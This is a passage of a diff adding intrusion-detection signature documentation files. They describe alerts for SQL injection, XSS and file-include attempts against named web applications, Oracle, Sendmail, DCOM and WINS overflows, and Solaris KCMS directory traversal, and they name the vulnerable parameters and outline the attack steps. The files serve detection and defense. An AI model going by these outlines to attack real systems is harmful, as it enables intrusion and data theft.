+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "typeface" parameter in the "index.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/2901.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2901
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure register_statistics
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/119-3.txt
@@ -0,0 +1,70 @@
+Rule: 
+
+--
+Sid: 
+119-3
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+
+Impact: 
+Unknown. This may be an attempt to evade an IDS.
+
+--
+Detailed Information:
+This event is generated when Unicode characters are present in a request
+sent to a web server. This may indicate an attempt to evade an IDS in an
+attempted attack against the server.
+
+No known browsers use unicode encoding, it is likely that this event
+indicates a malicious request.
+
+--
+Affected Systems:
+	Microsoft IIS Servers.
+
+--
+
+Attack Scenarios: 
+An attacker might encode the malicious request to the web server using
+Unicode characters, this may then evade an IDS monitoring traffic and 
+he could then launch a successful attack without being detected.
+
+-- 
+
+Ease of Attack: 
+Simple. Exploits exist.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/100000662.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000662
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "homepage" parameter in the "edit.php" script 
+used by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2005.txt
@@ -0,0 +1,90 @@
+Rule:
+
+--
+Sid:
+2005
+
+--
+Summary:
+KCMS (Kodak Color Management System) is an RPC (Remote Procedure Call)
+service for Sun Solaris operating systems. It is able to read profiles
+stored on remote machines. It is possible for an attacker to bypass
+directory traversal checks and read any file on the remote system.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources on the machine not limited to user accounts
+and business data.
+
+--
+Detailed Information:
+The attacker first needs to create a directory under
+/etc/openwin/devdata/profiles or /usr/openwin/etc/devdata/profiles,
+using the ToolTalk database server is one method of creating a
+directory. Once this has been achieved, the attacker is then able to
+perform the directory traversal.
+
+The directory traversal allows the attacker to read any file on the
+compromised system. Once a sensitive system file such as the system
+password database has been retrieved, the attacker may use other tools
+at his leisure to discover username and password information. This may
+lead to further system compromise.
+
+The KCMS daemon runs with root privileges and is typically started on
+boot via inetd. The ToolTalk database server is also commonly installed
+and started in this manner. The KCMS daemon usually listens on UDP port
+32871 although this can vary.
+
+--
+Affected Systems:
+	Sun Microsystems Solaris 2.5.1 (Sparc/Intel)
+	Sun Microsystems Solaris 2.6 (Sparc/Intel)
+	Sun Microsystems Solaris 7 (Sparc/Intel)
+	Sun Microsystems Solaris 8 (Sparc/Intel)
+	Sun Microsystems Solaris 9 (Sparc/Intel)
+
+--
+Attack Scenarios:
+The ToolTalk database server procedure TT_ISBUILD can be used to create
+a directory named TT_DB anywhere on a remote system. Creation of this
+directory then allows the attacker to use directory traversal to further
+compromise the machine.
+
+--
+Ease of Attack:
+Once the directory has been created, further compromise is simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the KCMS daemon in the file /etc/inetd.conf. Kill any running
+KCMS processes and restart the inet daemon.
+
+Configure your firewall to restrict external access to the TCP and UDP
+port 111 used by the RPC port mapper service and the range used by RPC
+services, typically 32700 to 34000.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/850785
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0027
+
+--
--- /dev/null
+++ b/doc/signatures/324.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+
+324
+
+--
+Summary:
+This event is generated when a null character in a Finger request is 
+detected.
+
+--
+Impact:
+Some systems will respond to a null finger request by supplying a list 
+of usernames present on the host.
+
+Disclosure of usernames is an Information Gathering risk.  The remote 
+user can use this information in other exploits that require knowing 
+user names, or as a basis for social engineering.
+
+--
+Detailed Information:
+A packet is transmitted to server port 79 (Finger) with a null character
+in the data.  Some Unix finger commands will respond with a full list of
+usernames.  A remote attacker could use this information for other 
+exploits, including dictionary-based password attacks and social 
+engineering attempts.
+
+--
+Affected Systems:
+	Some UNIX based systems
+
+--
+Attack Scenarios:
+See detailed information section above.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Disable the finger daemon in inetd.conf, or block untrusted access to 
+port 79 using a packet filtering firewall.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Darryl Davidson <ddavidson@talisman-intl.com>
+
+-- 
+Additional References: CVE-1999-0612, 
+
+Arachnids:
+http://www.whitehats.com/info/IDS377 (Arachnids,377)
+
+--
--- /dev/null
+++ b/doc/signatures/3306.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3306
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2606.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2606
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "comment_on_repobject" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "type" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck634.html
+
+--
--- /dev/null
+++ b/doc/signatures/3078.txt
@@ -0,0 +1,66 @@
+Rule:  
+
+--
+Sid:
+3078
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft implementation of the Network News Transport
+Protocol (NNTP) for Internet Information Server (IIS).
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+The Microsoft implementation of NNTP for IIS contains a programming
+error in the processing of user supplied input that may present an
+attacker with multiple opportunites to execute code of their choosing on
+an affected system.
+
+--
+Affected Systems:
+. Microsoft Windows NT Server 4.0 NNTP component
+. Microsoft Windows 2000 Server NNTP component
+. Microsoft Windows Server 2003 NNTP Component
+. Microsoft Windows Server 2003 64-Bit Edition NNTP Component
+
+--
+Attack Scenarios:
+An attacker must supply specially crafted input to a vulnerable system
+to cause the overflow to occur.
+
+--
+Ease of Attack:
+Moderate. Example code exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CORE Technologies:
+http://www.coresecurity.com/common/showdoc.php?idx=420&idxseccion=10
+
+--
--- /dev/null
+++ b/doc/signatures/100000368.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000368
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_disallow.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_disallow.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/862.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+862
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/968.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+968
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions 98
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q188/2/57.ASP&NoWebContent=1
+
+--
--- /dev/null
+++ b/doc/signatures/2266.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2266
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-12.html
+
+--
--- /dev/null
+++ b/doc/signatures/3196.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3196
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft WINS.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft WINS such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker would need to send multiple malformed request to the WINS
+service running on a host.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Uninstall the WINS service.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000458.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000458
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "DPVision Tradingeye Shop" application running 
+on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "image" parameter in the "details.cfm" script 
+used by the "DPVision Tradingeye Shop" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using DPVision Tradingeye Shop
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/256.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+256
+
+--
+Summary:
+This event is generated when an attempt is made to query authors.bind chaos 
+record on a DNS server.  
+
+--
+Impact:
+Information gathering. This activity may indicate reconnaisance before 
+an impending attack.
+
+--
+Detailed Information:
+Bind 9.x allows you get the authors.bind chaos record.  The ability to
+retrieve this file indicates that the machine is running at least a
+9.x variant of the bind nameserver.
+
+--
+Affected Systems:
+	All DNS Servers using Bind
+ 
+--
+Attack Scenarios:
+As part of a reconnaissance mission, an attacker may attempt to glean
+important information about network infrastructure by determining the
+bind version on a nameserver. If authors.bind is retrievable, this
+indicates that Bind 9.x is in use.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Remove the ability to retrieve the authors.bind chaos record by changing 
+the DNS configuration accordingly.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2664.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2664
+
+--
+Summary:
+This event is generated when a remote attacker attempts to exploit a 
+format string vulnerability against an IMAP server.
+
+--
+Impact:
+Serious. A successful format string attack could result in the
+execution of arbitrary code with the same privileges as the user running
+the IMAP daemon.
+
+--
+Detailed Information:
+Some versions of the Courier IMAP daemon are vulnerable to format string
+exploits prior to and during authentication to the IMAP server.  A
+successful exploit attempt could result in the remote attacker gaining
+unauthorized root access to a vulnerable system.
+
+--
+Affected Systems:
+	Courier IMAP server versions 1.6 though 3.0.2
+
+--
+Attack Scenarios:
+A remote attacker could use a publicly available script to exploit the 
+vulnerability an gain control of the target host.
+
+--
+
+Ease of Attack:
+Simple. Exploit code is available.
+
+--
+False Positives:
+This rule may generate an event if the password for a valid user contains 
+the character "%".
+
+--
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2172.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2172
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000515.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000515
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "CMS Faethon" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "mainpath" parameter in the "header.php" script 
+used by the "CMS Faethon" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using CMS Faethon
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/493.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid: 493
+
+--
+Summary: 
+This event is generated when an attempt is made to access the psyBNC IRC
+"bouncer".
+
+--
+Impact: 
+
+
+--
+Detailed Information:
+The psyBNC IRC bouncer was designed to hold a connection to an IRC server.  As part
+of the connection process, a psyBNC server will respond with
+"Welcome!psyBNC@lam3rz.de".
+
+--
+Affected Systems:
+ All systems using psyBNC.
+
+--
+Attack Scenarios:
+The psyBNC server itself is not necessarily a risk in itself, but this may be a
+violation of corporate policy. Furthermore, psyBNC has found it's way into a large number
+of rootkits, both as an IRC bouncer and as remote control agent for dDOS networks.
+
+--
+Ease of Attack:
+Simple. Any user can install psyBNC.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+A modified psyBNC server will not respond with "Welcome!psyBNC@lam3rz.de" and could
+easily evade this rule.
+
+SSL encryption between client and server is possible.
+
+--
+Corrective Action:
+Check the originating host IP and source port and investigate the possibility of a
+listening psyBNC server and possible system comprimise.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Jon Hart <warchild@spoofed.org>
+
+-- 
+Additional References:
+
+psyBNC:
+http://www.psychoid.lam3rz.de/
+http://www.psychoid.net/
+
+--
--- /dev/null
+++ b/doc/signatures/1670.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1670
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/829.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+829
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
